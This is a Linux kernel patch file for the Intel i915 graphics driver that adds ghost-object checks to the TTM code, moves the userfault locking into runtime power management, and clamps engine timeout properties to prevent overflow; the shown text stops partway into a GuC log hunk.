+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
+index 0d6d640225fc8..be4c081e7e13d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
+@@ -279,7 +279,7 @@ static struct ttm_tt *i915_ttm_tt_create(struct ttm_buffer_object *bo,
+ 	struct i915_ttm_tt *i915_tt;
+ 	int ret;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return NULL;
+ 
+ 	i915_tt = kzalloc(sizeof(*i915_tt), GFP_KERNEL);
+@@ -362,7 +362,7 @@ static bool i915_ttm_eviction_valuable(struct ttm_buffer_object *bo,
+ {
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return false;
+ 
+ 	/*
+@@ -509,18 +509,9 @@ static int i915_ttm_shrink(struct drm_i915_gem_object *obj, unsigned int flags)
+ static void i915_ttm_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+-	intel_wakeref_t wakeref = 0;
+-
+-	if (bo->resource && likely(obj)) {
+-		/* ttm_bo_release() already has dma_resv_lock */
+-		if (i915_ttm_cpu_maps_iomem(bo->resource))
+-			wakeref = intel_runtime_pm_get(&to_i915(obj->base.dev)->runtime_pm);
+ 
++	if (bo->resource && !i915_ttm_is_ghost_object(bo)) {
+ 		__i915_gem_object_pages_fini(obj);
+-
+-		if (wakeref)
+-			intel_runtime_pm_put(&to_i915(obj->base.dev)->runtime_pm, wakeref);
+-
+ 		i915_ttm_free_cached_io_rsgt(obj);
+ 	}
+ }
+@@ -628,7 +619,7 @@ static void i915_ttm_swap_notify(struct ttm_buffer_object *bo)
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 	int ret;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return;
+ 
+ 	ret = i915_ttm_move_notify(bo);
+@@ -661,7 +652,7 @@ static int i915_ttm_io_mem_reserve(struct ttm_device *bdev, struct ttm_resource
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(mem->bo);
+ 	bool unknown_state;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(mem->bo))
+ 		return -EINVAL;
+ 
+ 	if (!kref_get_unless_zero(&obj->base.refcount))
+@@ -694,7 +685,7 @@ static unsigned long i915_ttm_io_mem_pfn(struct ttm_buffer_object *bo,
+ 	unsigned long base;
+ 	unsigned int ofs;
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(bo));
+ 	GEM_WARN_ON(bo->ttm);
+ 
+ 	base = obj->mm.region->iomap.base - obj->mm.region->region.start;
+@@ -994,13 +985,12 @@ static vm_fault_t vm_fault_ttm(struct vm_fault *vmf)
+ 	struct vm_area_struct *area = vmf->vma;
+ 	struct ttm_buffer_object *bo = area->vm_private_data;
+ 	struct drm_device *dev = bo->base.dev;
+-	struct drm_i915_gem_object *obj;
++	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 	intel_wakeref_t wakeref = 0;
+ 	vm_fault_t ret;
+ 	int idx;
+ 
+-	obj = i915_ttm_to_gem(bo);
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return VM_FAULT_SIGBUS;
+ 
+ 	/* Sanity check that we allow writing into this object */
+@@ -1057,16 +1047,19 @@ static vm_fault_t vm_fault_ttm(struct vm_fault *vmf)
+ 	if (ret == VM_FAULT_RETRY && !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT))
+ 		goto out_rpm;
+ 
+-	/* ttm_bo_vm_reserve() already has dma_resv_lock */
++	/*
++	 * ttm_bo_vm_reserve() already has dma_resv_lock.
++	 * userfault_count is protected by dma_resv lock and rpm wakeref.
++	 */
+ 	if (ret == VM_FAULT_NOPAGE && wakeref && !obj->userfault_count) {
+ 		obj->userfault_count = 1;
+-		mutex_lock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		list_add(&obj->userfault_link, &to_gt(to_i915(obj->base.dev))->lmem_userfault_list);
+-		mutex_unlock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
++		spin_lock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++		list_add(&obj->userfault_link, &to_i915(obj->base.dev)->runtime_pm.lmem_userfault_list);
++		spin_unlock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
+ 	}
+ 
+ 	if (wakeref & CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND)
+-		intel_wakeref_auto(&to_gt(to_i915(obj->base.dev))->userfault_wakeref,
++		intel_wakeref_auto(&to_i915(obj->base.dev)->runtime_pm.userfault_wakeref,
+ 				   msecs_to_jiffies_timeout(CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND));
+ 
+ 	i915_ttm_adjust_lru(obj);
+@@ -1098,7 +1091,7 @@ static void ttm_vm_open(struct vm_area_struct *vma)
+ 	struct drm_i915_gem_object *obj =
+ 		i915_ttm_to_gem(vma->vm_private_data);
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(vma->vm_private_data));
+ 	i915_gem_object_get(obj);
+ }
+ 
+@@ -1107,7 +1100,7 @@ static void ttm_vm_close(struct vm_area_struct *vma)
+ 	struct drm_i915_gem_object *obj =
+ 		i915_ttm_to_gem(vma->vm_private_data);
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(vma->vm_private_data));
+ 	i915_gem_object_put(obj);
+ }
+ 
+@@ -1128,7 +1121,27 @@ static u64 i915_ttm_mmap_offset(struct drm_i915_gem_object *obj)
+ 
+ static void i915_ttm_unmap_virtual(struct drm_i915_gem_object *obj)
+ {
++	struct ttm_buffer_object *bo = i915_gem_to_ttm(obj);
++	intel_wakeref_t wakeref = 0;
++
++	assert_object_held_shared(obj);
++
++	if (i915_ttm_cpu_maps_iomem(bo->resource)) {
++		wakeref = intel_runtime_pm_get(&to_i915(obj->base.dev)->runtime_pm);
++
++		/* userfault_count is protected by obj lock and rpm wakeref. */
++		if (obj->userfault_count) {
++			spin_lock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++			list_del(&obj->userfault_link);
++			spin_unlock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++			obj->userfault_count = 0;
++		}
++	}
++
+ 	ttm_bo_unmap_virtual(i915_gem_to_ttm(obj));
++
++	if (wakeref)
++		intel_runtime_pm_put(&to_i915(obj->base.dev)->runtime_pm, wakeref);
+ }
+ 
+ static const struct drm_i915_gem_object_ops i915_gem_ttm_obj_ops = {
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm.h b/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
+index e4842b4296fc2..2a94a99ef76b4 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
+@@ -27,19 +27,27 @@ i915_gem_to_ttm(struct drm_i915_gem_object *obj)
+  */
+ void i915_ttm_bo_destroy(struct ttm_buffer_object *bo);
+ 
++/**
++ * i915_ttm_is_ghost_object - Check if the ttm bo is a ghost object.
++ * @bo: Pointer to the ttm buffer object
++ *
++ * Return: True if the ttm bo is not a i915 object but a ghost ttm object,
++ * False otherwise.
++ */
++static inline bool i915_ttm_is_ghost_object(struct ttm_buffer_object *bo)
++{
++	return bo->destroy != i915_ttm_bo_destroy;
++}
++
+ /**
+  * i915_ttm_to_gem - Convert a struct ttm_buffer_object to an embedding
+  * struct drm_i915_gem_object.
+  *
+- * Return: Pointer to the embedding struct ttm_buffer_object, or NULL
+- * if the object was not an i915 ttm object.
++ * Return: Pointer to the embedding struct ttm_buffer_object.
+  */
+ static inline struct drm_i915_gem_object *
+ i915_ttm_to_gem(struct ttm_buffer_object *bo)
+ {
+-	if (bo->destroy != i915_ttm_bo_destroy)
+-		return NULL;
+-
+ 	return container_of(bo, struct drm_i915_gem_object, __do_not_access);
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
+index 9a7e50534b84b..f59f812dc6d29 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
+@@ -560,7 +560,7 @@ int i915_ttm_move(struct ttm_buffer_object *bo, bool evict,
+ 	bool clear;
+ 	int ret;
+ 
+-	if (GEM_WARN_ON(!obj)) {
++	if (GEM_WARN_ON(i915_ttm_is_ghost_object(bo))) {
+ 		ttm_bo_move_null(bo, dst_mem);
+ 		return 0;
+ 	}
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine.h b/drivers/gpu/drm/i915/gt/intel_engine.h
+index 04e435bce79bd..cbc8b857d5f7a 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine.h
+@@ -348,4 +348,10 @@ intel_engine_get_hung_context(struct intel_engine_cs *engine)
+ 	return engine->hung_ce;
+ }
+ 
++u64 intel_clamp_heartbeat_interval_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_max_busywait_duration_ns(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_preempt_timeout_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_stop_timeout_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_timeslice_duration_ms(struct intel_engine_cs *engine, u64 value);
++
+ #endif /* _INTEL_RINGBUFFER_H_ */
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index 1f7188129cd1f..83bfeb872bdaa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -486,6 +486,17 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 	engine->logical_mask = BIT(logical_instance);
+ 	__sprint_engine_name(engine);
+ 
++	if ((engine->class == COMPUTE_CLASS && !RCS_MASK(engine->gt) &&
++	     __ffs(CCS_MASK(engine->gt)) == engine->instance) ||
++	     engine->class == RENDER_CLASS)
++		engine->flags |= I915_ENGINE_FIRST_RENDER_COMPUTE;
++
++	/* features common between engines sharing EUs */
++	if (engine->class == RENDER_CLASS || engine->class == COMPUTE_CLASS) {
++		engine->flags |= I915_ENGINE_HAS_RCS_REG_STATE;
++		engine->flags |= I915_ENGINE_HAS_EU_PRIORITY;
++	}
++
+ 	engine->props.heartbeat_interval_ms =
+ 		CONFIG_DRM_I915_HEARTBEAT_INTERVAL;
+ 	engine->props.max_busywait_duration_ns =
+@@ -498,19 +509,28 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 		CONFIG_DRM_I915_TIMESLICE_DURATION;
+ 
+ 	/* Override to uninterruptible for OpenCL workloads. */
+-	if (GRAPHICS_VER(i915) == 12 && engine->class == RENDER_CLASS)
++	if (GRAPHICS_VER(i915) == 12 && (engine->flags & I915_ENGINE_HAS_RCS_REG_STATE))
+ 		engine->props.preempt_timeout_ms = 0;
+ 
+-	if ((engine->class == COMPUTE_CLASS && !RCS_MASK(engine->gt) &&
+-	     __ffs(CCS_MASK(engine->gt)) == engine->instance) ||
+-	     engine->class == RENDER_CLASS)
+-		engine->flags |= I915_ENGINE_FIRST_RENDER_COMPUTE;
+-
+-	/* features common between engines sharing EUs */
+-	if (engine->class == RENDER_CLASS || engine->class == COMPUTE_CLASS) {
+-		engine->flags |= I915_ENGINE_HAS_RCS_REG_STATE;
+-		engine->flags |= I915_ENGINE_HAS_EU_PRIORITY;
+-	}
++	/* Cap properties according to any system limits */
++#define CLAMP_PROP(field) \
++	do { \
++		u64 clamp = intel_clamp_##field(engine, engine->props.field); \
++		if (clamp != engine->props.field) { \
++			drm_notice(&engine->i915->drm, \
++				   "Warning, clamping %s to %lld to prevent overflow\n", \
++				   #field, clamp); \
++			engine->props.field = clamp; \
++		} \
++	} while (0)
++
++	CLAMP_PROP(heartbeat_interval_ms);
++	CLAMP_PROP(max_busywait_duration_ns);
++	CLAMP_PROP(preempt_timeout_ms);
++	CLAMP_PROP(stop_timeout_ms);
++	CLAMP_PROP(timeslice_duration_ms);
++
++#undef CLAMP_PROP
+ 
+ 	engine->defaults = engine->props; /* never to change again */
+ 
+@@ -534,6 +554,55 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 	return 0;
+ }
+ 
++u64 intel_clamp_heartbeat_interval_ms(struct intel_engine_cs *engine, u64 value)
++{
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_max_busywait_duration_ns(struct intel_engine_cs *engine, u64 value)
++{
++	value = min(value, jiffies_to_nsecs(2));
++
++	return value;
++}
++
++u64 intel_clamp_preempt_timeout_ms(struct intel_engine_cs *engine, u64 value)
++{
++	/*
++	 * NB: The GuC API only supports 32bit values. However, the limit is further
++	 * reduced due to internal calculations which would otherwise overflow.
++	 */
++	if (intel_guc_submission_is_wanted(&engine->gt->uc.guc))
++		value = min_t(u64, value, guc_policy_max_preempt_timeout_ms());
++
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_stop_timeout_ms(struct intel_engine_cs *engine, u64 value)
++{
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_timeslice_duration_ms(struct intel_engine_cs *engine, u64 value)
++{
++	/*
++	 * NB: The GuC API only supports 32bit values. However, the limit is further
++	 * reduced due to internal calculations which would otherwise overflow.
++	 */
++	if (intel_guc_submission_is_wanted(&engine->gt->uc.guc))
++		value = min_t(u64, value, guc_policy_max_exec_quantum_ms());
++
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
+ static void __setup_engine_capabilities(struct intel_engine_cs *engine)
+ {
+ 	struct drm_i915_private *i915 = engine->i915;
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index 7caa3412a2446..c7db49749a636 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -40,8 +40,6 @@ void intel_gt_common_init_early(struct intel_gt *gt)
+ {
+ 	spin_lock_init(gt->irq_lock);
+ 
+-	INIT_LIST_HEAD(&gt->lmem_userfault_list);
+-	mutex_init(&gt->lmem_userfault_lock);
+ 	INIT_LIST_HEAD(&gt->closed_vma);
+ 	spin_lock_init(&gt->closed_lock);
+ 
+@@ -812,7 +810,6 @@ static int intel_gt_tile_setup(struct intel_gt *gt, phys_addr_t phys_addr)
+ 	}
+ 
+ 	intel_uncore_init_early(gt->uncore, gt);
+-	intel_wakeref_auto_init(&gt->userfault_wakeref, gt->uncore->rpm);
+ 
+ 	ret = intel_uncore_setup_mmio(gt->uncore, phys_addr);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_types.h b/drivers/gpu/drm/i915/gt/intel_gt_types.h
+index f19c2de77ff66..184ee9b11a4da 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_types.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_types.h
+@@ -141,20 +141,6 @@ struct intel_gt {
+ 	struct intel_wakeref wakeref;
+ 	atomic_t user_wakeref;
+ 
+-	/**
+-	 *  Protects access to lmem usefault list.
+-	 *  It is required, if we are outside of the runtime suspend path,
+-	 *  access to @lmem_userfault_list requires always first grabbing the
+-	 *  runtime pm, to ensure we can't race against runtime suspend.
+-	 *  Once we have that we also need to grab @lmem_userfault_lock,
+-	 *  at which point we have exclusive access.
+-	 *  The runtime suspend path is special since it doesn't really hold any locks,
+-	 *  but instead has exclusive access by virtue of all other accesses requiring
+-	 *  holding the runtime pm wakeref.
+-	 */
+-	struct mutex lmem_userfault_lock;
+-	struct list_head lmem_userfault_list;
+-
+ 	struct list_head closed_vma;
+ 	spinlock_t closed_lock; /* guards the list of closed_vma */
+ 
+@@ -170,9 +156,6 @@ struct intel_gt {
+ 	 */
+ 	intel_wakeref_t awake;
+ 
+-	/* Manual runtime pm autosuspend delay for user GGTT/lmem mmaps */
+-	struct intel_wakeref_auto userfault_wakeref;
+-
+ 	u32 clock_frequency;
+ 	u32 clock_period_ns;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/sysfs_engines.c b/drivers/gpu/drm/i915/gt/sysfs_engines.c
+index 9670310562029..f2d9858d827c2 100644
+--- a/drivers/gpu/drm/i915/gt/sysfs_engines.c
++++ b/drivers/gpu/drm/i915/gt/sysfs_engines.c
+@@ -144,7 +144,7 @@ max_spin_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	       const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -168,7 +168,8 @@ max_spin_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_nsecs(2))
++	clamped = intel_clamp_max_busywait_duration_ns(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.max_busywait_duration_ns, duration);
+@@ -203,7 +204,7 @@ timeslice_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -218,7 +219,8 @@ timeslice_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_timeslice_duration_ms(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.timeslice_duration_ms, duration);
+@@ -256,7 +258,7 @@ stop_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	   const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -272,7 +274,8 @@ stop_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_stop_timeout_ms(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.stop_timeout_ms, duration);
+@@ -306,7 +309,7 @@ preempt_timeout_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		      const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long timeout;
++	unsigned long long timeout, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -322,7 +325,8 @@ preempt_timeout_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (timeout > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_preempt_timeout_ms(engine, timeout);
++	if (timeout != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.preempt_timeout_ms, timeout);
+@@ -362,7 +366,7 @@ heartbeat_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long delay;
++	unsigned long long delay, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -379,7 +383,8 @@ heartbeat_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (delay >= jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_heartbeat_interval_ms(engine, delay);
++	if (delay != clamped)
+ 		return -EINVAL;
+ 
+ 	err = intel_engine_set_heartbeat(engine, delay);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 8f11651460131..685ddccc0f26a 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -165,7 +165,7 @@ static const struct __guc_mmio_reg_descr empty_regs_list[] = {
+ 	}
+ 
+ /* List of lists */
+-static struct __guc_mmio_reg_descr_group default_lists[] = {
++static const struct __guc_mmio_reg_descr_group default_lists[] = {
+ 	MAKE_REGLIST(default_global_regs, PF, GLOBAL, 0),
+ 	MAKE_REGLIST(default_rc_class_regs, PF, ENGINE_CLASS, GUC_RENDER_CLASS),
+ 	MAKE_REGLIST(xe_lpd_rc_inst_regs, PF, ENGINE_INSTANCE, GUC_RENDER_CLASS),
+@@ -419,6 +419,44 @@ guc_capture_get_device_reglist(struct intel_guc *guc)
+ 	return default_lists;
+ }
+ 
++static const char *
++__stringify_type(u32 type)
++{
++	switch (type) {
++	case GUC_CAPTURE_LIST_TYPE_GLOBAL:
++		return "Global";
++	case GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS:
++		return "Class";
++	case GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE:
++		return "Instance";
++	default:
++		break;
++	}
++
++	return "unknown";
++}
++
++static const char *
++__stringify_engclass(u32 class)
++{
++	switch (class) {
++	case GUC_RENDER_CLASS:
++		return "Render";
++	case GUC_VIDEO_CLASS:
++		return "Video";
++	case GUC_VIDEOENHANCE_CLASS:
++		return "VideoEnhance";
++	case GUC_BLITTER_CLASS:
++		return "Blitter";
++	case GUC_COMPUTE_CLASS:
++		return "Compute";
++	default:
++		break;
++	}
++
++	return "unknown";
++}
++
+ static int
+ guc_capture_list_init(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
+ 		      struct guc_mmio_reg *ptr, u16 num_entries)
+@@ -482,32 +520,55 @@ guc_cap_list_num_regs(struct intel_guc_state_capture *gc, u32 owner, u32 type, u
+ 	return num_regs;
+ }
+ 
+-int
+-intel_guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
+-			      size_t *size)
++static int
++guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
++			size_t *size, bool is_purpose_est)
+ {
+ 	struct intel_guc_state_capture *gc = guc->capture;
++	struct drm_i915_private *i915 = guc_to_gt(guc)->i915;
+ 	struct __guc_capture_ads_cache *cache = &gc->ads_cache[owner][type][classid];
+ 	int num_regs;
+ 
+-	if (!gc->reglists)
++	if (!gc->reglists) {
++		drm_warn(&i915->drm, "GuC-capture: No reglist on this device\n");
+ 		return -ENODEV;
++	}
+ 
+ 	if (cache->is_valid) {
+ 		*size = cache->size;
+ 		return cache->status;
+ 	}
+ 
++	if (!is_purpose_est && owner == GUC_CAPTURE_LIST_INDEX_PF &&
++	    !guc_capture_get_one_list(gc->reglists, owner, type, classid)) {
++		if (type == GUC_CAPTURE_LIST_TYPE_GLOBAL)
++			drm_warn(&i915->drm, "Missing GuC-Err-Cap reglist Global!\n");
++		else
++			drm_warn(&i915->drm, "Missing GuC-Err-Cap reglist %s(%u):%s(%u)!\n",
++				 __stringify_type(type), type,
++				 __stringify_engclass(classid), classid);
++		return -ENODATA;
++	}
++
+ 	num_regs = guc_cap_list_num_regs(gc, owner, type, classid);
++	/* intentional empty lists can exist depending on hw config */
+ 	if (!num_regs)
+ 		return -ENODATA;
+ 
+-	*size = PAGE_ALIGN((sizeof(struct guc_debug_capture_list)) +
+-			   (num_regs * sizeof(struct guc_mmio_reg)));
++	if (size)
++		*size = PAGE_ALIGN((sizeof(struct guc_debug_capture_list)) +
++				   (num_regs * sizeof(struct guc_mmio_reg)));
+ 
+ 	return 0;
+ }
+ 
++int
++intel_guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
++			      size_t *size)
++{
++	return guc_capture_getlistsize(guc, owner, type, classid, size, false);
++}
++
+ static void guc_capture_create_prealloc_nodes(struct intel_guc *guc);
+ 
+ int
+@@ -606,7 +667,7 @@ guc_capture_output_min_size_est(struct intel_guc *guc)
+ 	struct intel_gt *gt = guc_to_gt(guc);
+ 	struct intel_engine_cs *engine;
+ 	enum intel_engine_id id;
+-	int worst_min_size = 0, num_regs = 0;
++	int worst_min_size = 0;
+ 	size_t tmp = 0;
+ 
+ 	if (!guc->capture)
+@@ -627,21 +688,19 @@ guc_capture_output_min_size_est(struct intel_guc *guc)
+ 		worst_min_size += sizeof(struct guc_state_capture_group_header_t) +
+ 					 (3 * sizeof(struct guc_state_capture_header_t));
+ 
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_GLOBAL, 0, &tmp))
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_GLOBAL, 0, &tmp, true))
++			worst_min_size += tmp;
+ 
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS,
+-						   engine->class, &tmp)) {
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS,
++					     engine->class, &tmp, true)) {
++			worst_min_size += tmp;
+ 		}
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE,
+-						   engine->class, &tmp)) {
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE,
++					     engine->class, &tmp, true)) {
++			worst_min_size += tmp;
+ 		}
+ 	}
+ 
+-	worst_min_size += (num_regs * sizeof(struct guc_mmio_reg));
+-
+ 	return worst_min_size;
+ }
+ 
+@@ -658,15 +717,23 @@ static void check_guc_capture_size(struct intel_guc *guc)
+ 	int spare_size = min_size * GUC_CAPTURE_OVERBUFFER_MULTIPLIER;
+ 	u32 buffer_size = intel_guc_log_section_size_capture(&guc->log);
+ 
++	/*
++	 * NOTE: min_size is much smaller than the capture region allocation (DG2: <80K vs 1MB)
++	 * Additionally, its based on space needed to fit all engines getting reset at once
++	 * within the same G2H handler task slot. This is very unlikely. However, if GuC really
++	 * does run out of space for whatever reason, we will see an separate warning message
++	 * when processing the G2H event capture-notification, search for:
++	 * INTEL_GUC_STATE_CAPTURE_EVENT_STATUS_NOSPACE.
++	 */
+ 	if (min_size < 0)
+ 		drm_warn(&i915->drm, "Failed to calculate GuC error state capture buffer minimum size: %d!\n",
+ 			 min_size);
+ 	else if (min_size > buffer_size)
+-		drm_warn(&i915->drm, "GuC error state capture buffer is too small: %d < %d\n",
++		drm_warn(&i915->drm, "GuC error state capture buffer maybe small: %d < %d\n",
+ 			 buffer_size, min_size);
+ 	else if (spare_size > buffer_size)
+-		drm_notice(&i915->drm, "GuC error state capture buffer maybe too small: %d < %d (min = %d)\n",
+-			   buffer_size, spare_size, min_size);
++		drm_dbg(&i915->drm, "GuC error state capture buffer lacks spare size: %d < %d (min = %d)\n",
++			buffer_size, spare_size, min_size);
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h b/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
+index 323b055e5db97..502e7cb5a3025 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
+@@ -305,6 +305,27 @@ struct guc_update_context_policy {
+ 
+ #define GLOBAL_POLICY_DEFAULT_DPC_PROMOTE_TIME_US 500000
+ 
++/*
++ * GuC converts the timeout to clock ticks internally. Different platforms have
++ * different GuC clocks. Thus, the maximum value before overflow is platform
++ * dependent. Current worst case scenario is about 110s. So, the spec says to
++ * limit to 100s to be safe.
++ */
++#define GUC_POLICY_MAX_EXEC_QUANTUM_US		(100 * 1000 * 1000UL)
++#define GUC_POLICY_MAX_PREEMPT_TIMEOUT_US	(100 * 1000 * 1000UL)
++
++static inline u32 guc_policy_max_exec_quantum_ms(void)
++{
++	BUILD_BUG_ON(GUC_POLICY_MAX_EXEC_QUANTUM_US >= UINT_MAX);
++	return GUC_POLICY_MAX_EXEC_QUANTUM_US / 1000;
++}
++
++static inline u32 guc_policy_max_preempt_timeout_ms(void)
++{
++	BUILD_BUG_ON(GUC_POLICY_MAX_PREEMPT_TIMEOUT_US >= UINT_MAX);
++	return GUC_POLICY_MAX_PREEMPT_TIMEOUT_US / 1000;
++}
++
+ struct guc_policies {
+ 	u32 submission_queue_depth[GUC_MAX_ENGINE_CLASSES];
+ 	/* In micro seconds. How much time to allow before DPC processing is
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
+index 55d3ef93e86f8..68331c538b0a7 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
+@@ -16,15 +16,15 @@
